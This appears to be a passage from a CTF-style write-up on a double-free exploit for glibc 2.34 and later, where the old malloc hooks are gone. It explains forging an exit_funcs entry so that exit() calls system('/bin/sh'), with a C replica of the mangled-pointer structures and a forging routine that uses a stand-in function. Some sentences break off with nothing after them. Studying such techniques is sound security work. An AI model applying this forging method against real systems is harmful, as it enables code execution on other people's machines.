
A complete cutting edge exploit

OK, so I want to begin at the end and go for a full, working exploit on the latest glibc.

Here we go:

This is "Level 4" (PCP 30) running on nc 1773 with source in

This one is a double-free-only version of our code (just like Level 3) but without `__free_hook` available: glibc 2.34 removed the malloc hooks (`__malloc_hook`, `__free_hook`, and friends), so the hook-overwrite trick from the earlier level no longer works.

Here is our exploit in pseudo-code:

We're going to learn from a write-up and we'll want some extra tools.

Some useful stuff:

Main Difference: exit_funcs

glibc keeps a list of functions that `exit()` runs at the end of the process: everything registered through `atexit`/`__cxa_atexit` lands in a linked list of `struct exit_function_list` nodes reached from `__exit_funcs`, whose first node (`initial`) sits in libc's writable data. Each entry carries a `flavor` (e.g. `ef_cxa`) and a function pointer plus argument, and `__run_exit_handlers` walks the list and calls them. We're going to overwrite one of those entries so that `system("/bin/sh")` is called from exit_funcs. The caveat a practitioner needs: the function pointers in the list are stored mangled (`PTR_MANGLE`: XOR with the per-process pointer guard, then a rotate), so a forged entry only fires if you leak or control the pointer guard as well, not just the address of `system`.
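The following is an added example, not code from the original page or the course: a user-space replica of glibc's exit_funcs structures and of the `ef_cxa` branch of `__run_exit_handlers`, so the shape of a forged entry and the role of the pointer guard can be tried offline. The struct layouts are copied from glibc's `stdlib/exit.h` as it is on x86_64 (assumed to match the target's version), the mangling is x86_64 `PTR_MANGLE` (XOR with the guard at `fs:0x30`, rotate left by 0x11), `fake_system` stands in for `system` so nothing is spawned, and `read_pointer_guard` is only a demonstration of where the live guard sits; the real `__exit_funcs` is never touched.

```c
// Added example (not from the original page): replica of glibc's exit_funcs
// machinery showing what a forged ef_cxa entry must look like and why the
// pointer guard matters. Layouts follow glibc stdlib/exit.h on x86_64 (assumed
// to match the target glibc). Nothing here modifies the real __exit_funcs.
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

enum { ef_free, ef_us, ef_on, ef_at, ef_cxa };     /* ef_free MUST be zero */

struct exit_function {
    long flavor;
    union {
        void (*at)(void);
        struct { void (*fn)(int, void *); void *arg; } on;
        struct { void (*fn)(void *, int); void *arg; void *dso_handle; } cxa;
    } func;
};

struct exit_function_list {
    struct exit_function_list *next;
    size_t idx;                       /* number of live entries in fns[] */
    struct exit_function fns[32];
};

static uint64_t rol64(uint64_t v, unsigned n) { return (v << n) | (v >> (64 - n)); }
static uint64_t ror64(uint64_t v, unsigned n) { return (v >> n) | (v << (64 - n)); }

/* PTR_MANGLE / PTR_DEMANGLE exactly as glibc does them on x86_64. */
uint64_t ptr_mangle(uint64_t p, uint64_t guard)   { return rol64(p ^ guard, 0x11); }
uint64_t ptr_demangle(uint64_t m, uint64_t guard) { return ror64(m, 0x11) ^ guard; }

/* Read the live pointer guard (fs:0x30) on x86_64 Linux; 0 elsewhere. In the
   real exploit this is the value you must leak or overwrite before forging. */
uint64_t read_pointer_guard(void) {
    uint64_t g = 0;
#if defined(__x86_64__) && defined(__linux__)
    __asm__ volatile("mov %%fs:0x30, %0" : "=r"(g));
#endif
    return g;
}

/* Forge an ef_cxa entry: this is the 32-byte record the exploit writes. */
void forge_cxa_entry(struct exit_function *e, void (*fn)(void *, int),
                     void *arg, uint64_t guard) {
    memset(e, 0, sizeof *e);
    e->flavor = ef_cxa;
    e->func.cxa.fn  = (void (*)(void *, int))(uintptr_t)ptr_mangle((uintptr_t)fn, guard);
    e->func.cxa.arg = arg;            /* arg is passed through unmangled */
}

/* Replica of the ef_at/ef_cxa handling in __run_exit_handlers: walk the list,
   consume entries from idx-1 downwards, demangle, call. */
void run_exit_handlers_replica(struct exit_function_list *list, int status,
                               uint64_t guard) {
    for (struct exit_function_list *cur = list; cur; cur = cur->next) {
        while (cur->idx > 0) {
            struct exit_function *f = &cur->fns[--cur->idx];
            switch (f->flavor) {
            case ef_at: {
                void (*at)(void) = (void (*)(void))(uintptr_t)
                    ptr_demangle((uintptr_t)f->func.at, guard);
                at();
                break;
            }
            case ef_cxa: {
                void (*cxa)(void *, int) = (void (*)(void *, int))(uintptr_t)
                    ptr_demangle((uintptr_t)f->func.cxa.fn, guard);
                cxa(f->func.cxa.arg, status);
                break;
            }
            default:                  /* ef_free / ef_us / ef_on: not modelled */
                break;
            }
        }
    }
}

/* Stand-in for system(): records the call instead of spawning a shell. */
static const char *g_called_with;
static int g_status;
static void fake_system(void *arg, int status) { g_called_with = arg; g_status = status; }

/* Build a list holding one forged entry, run the replica, report success. */
int demo_forged_exit(uint64_t guard) {
    struct exit_function_list list;
    memset(&list, 0, sizeof list);
    forge_cxa_entry(&list.fns[0], fake_system, "/bin/sh", guard);
    list.idx = 1;                     /* the loop only visits fns[0..idx) */
    g_called_with = NULL; g_status = -1;
    run_exit_handlers_replica(&list, 0, guard);
    return g_called_with && strcmp(g_called_with, "/bin/sh") == 0 && g_status == 0;
}

int main(void) {
    uint64_t guard = read_pointer_guard();
    printf("live pointer guard: 0x%016llx\n", (unsigned long long)guard);
    printf("forged entry fires with the right guard: %d\n", demo_forged_exit(guard));
    /* Mangled with one guard, demangled with another: a garbage address, which
       is why the exploit needs the guard and not only the address of system. */
    printf("wrong-guard demangle of fake_system: 0x%llx (real: 0x%llx)\n",
           (unsigned long long)ptr_demangle(ptr_mangle((uintptr_t)fake_system, 0x1234), 0),
           (unsigned long long)(uintptr_t)fake_system);
    return 0;
}
```

In a real target the forged record goes into `initial.fns[]` (or a node you control via the double free), `initial.idx` must cover it, and the mangled pointer must be computed with the process's own guard; the replica makes that dependency visible by letting you swap the guard and watch the demangled address turn to garbage.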